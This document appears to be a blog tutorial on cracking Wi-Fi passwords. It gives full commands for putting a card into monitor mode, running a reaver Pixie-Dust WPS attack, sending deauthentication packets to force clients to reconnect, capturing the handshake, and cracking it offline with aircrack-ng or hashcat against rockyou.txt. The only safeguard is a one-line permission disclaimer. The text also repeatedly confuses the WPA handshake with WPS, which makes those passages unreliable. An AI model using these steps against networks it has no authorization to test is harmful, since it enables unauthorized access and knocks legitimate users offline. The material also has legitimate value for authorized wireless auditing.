Disclaimer: It is a good idea to test your own personal wireless network or your company wireless network. Do this at your own risk and make sure you have permission to do the below.
The tools we will use
Tool | Purpose |
airmon-ng | Get your wireless NIC into monitor mode |
airodump-ng | List all the wireless networks your wireless NIC can see |
reaver (wash) | WPS based cracking |
aireplay-ng | To deauth clients for WPS based cracking |
aircrack-ng | To crack the password of a captured WPS handshake |
hashcat (optional) | Faster than aircrack-ng and can use your GPU |
Step 1: Get your wireless NIC into monitor mode
Get your wireless NIC name. Usually it is wlan0
iwconfig
Now kill all processes that might hold on to that NIC preventing it from going into monitor mode, such as Network Manager.
sudo airmon-ng check kill
And now put your NIC into monitor mode:
sudo airmon-ng start wlan0
Run iwconfig again, you should now see something like wlan0mon and it should show mode:monitor. Take note not all wireless NICs can go into monitor mode.
Get your wireless NIC out of monitor mode and put things back the way they were
This will put things back to normal:
sudo airmon-ng stop wlan0mon
sudo service NetworkManager restart
Step 2: Airodump
Now run this command
sudo airodump-ng wlan0mon
If all goes well, you will see output such as this:
The above command will channel hop, i.e. scan all channels, so if you want to monitor only a specific channel, run this command:
sudo airodump-ng -c 6 wlan0mon
And if you want to save the captured packets to a file, run this command:
sudo airodump-ng -w capture wlan0mon
Step 2.1: Reaver and wash for WPS
Lets sidetrack to reaver quickly as it focuses mainly on WPS, which can be quite a lucrative attack vector. WPS2, which most devices are using nowadays, are not that susceptible to WPS attacks, but it is definitely worth a look.
Just like airodump above showed us wireless routers and their encryption and cipher, wash will show us the same information but for WPS and the version of WPS the wireless routers are using.
sudo wash -i wlan0mon
Once you have find a suitable target, run this command:
sudo reaver -i wlan0mon -b <target_bssid> -c <channel> -K 1
(K 1 tells reaver to use the Pixiedust attack)
Take note that you can lock WPS on the wireless router if you are not careful, so check the reaver help with sudo reaver -h to see how you can slow things down a bit
Step 3: WPS handshake attack
In this section we will now focus on getting that WPS handshake that we can crack offline using a wordlist such as rockyou.txt.
Run the below command to start capturing packets for only 1 specific wireless router and to see which clients are connected to this wireless router. We will grab WPS handshake packets from these clients.
(The output file issued in the below command will contain the captured packets which we will use when cracking the password)
sudo airodump-ng -c <channel> --bssid <BSSID> -w <output_file> wlan0mon
- The green block is the BSSID we are sniffing for clients
- The yellow block are all the clients connected to this BSSID
- The red block above that reads “WPA handshake: C8:51:*” will be displayed when we capture a WPS handshake which we will get to below.
Forcing a deauth to get a WPS handshake
You can either wait for a handshake to occur, which happens when a client connects or a connected client reauthenticates, or you can force a connected client to reauthenticate. We will force a client to reauthenticate by sending deauth packets to that client.
Open up a new terminal and issue this command:
sudo aireplay-ng --deauth 10 -a <BSSID> -c <Client_MAC> wlan0mon
You will know the deuth was successful when the terminal in which airodump is running displays this in the top right corner:
Step 4: Crack the WPS password
Lets validate our output file to make sure it does contain a valid handshake:
sudo aircrack-ng <output_file>.cap
Wordlists
You should have several wordlists in /usr/share/wordlists but we will use rockyou.txt. Unzip rockyou.txt.gz using this command:
sudo gunzip rockyou.txt.gz
Now you can start the cracking process
sudo aircrack-ng <output_file>.cap -w /usr/share/wordlists/rockyou.txt
This will take quite some time depending on your CPU. On my old 4th gen dual core i5 laptop CPU, I only get 3500 or so hashes per second, which is extremely slow compared to a modern CPU or GPU.
Below is a bonus section where we will use hashcat.
Bonus Section: Hashcat
Hashcat tends to be quite a bit faster, in my case, about 15% on the CPU, plus it allows you to use your GPU if it is supported.
We first have to get the cap file into hashcat format:
sudo apt-get install hcxtools
sudo hcxpcapngtool -o <output_file>.hccapx <input_file>.cap
To see if you can use your GPU issue this command:
sudo hashcat -I
This will show all the devices you can use in the cracking process. I only have 1 device so I will specify “-d 1” in my hashcat command to use the first device which is my CPU.
Lets fire up hashcat to crack the password:
hashcat -m 22000 -a 0 -d 1 capture.hccapx /usr/share/wordlists/rockyou.txt
Now just let it finish and see if rockyou.txt contained the password!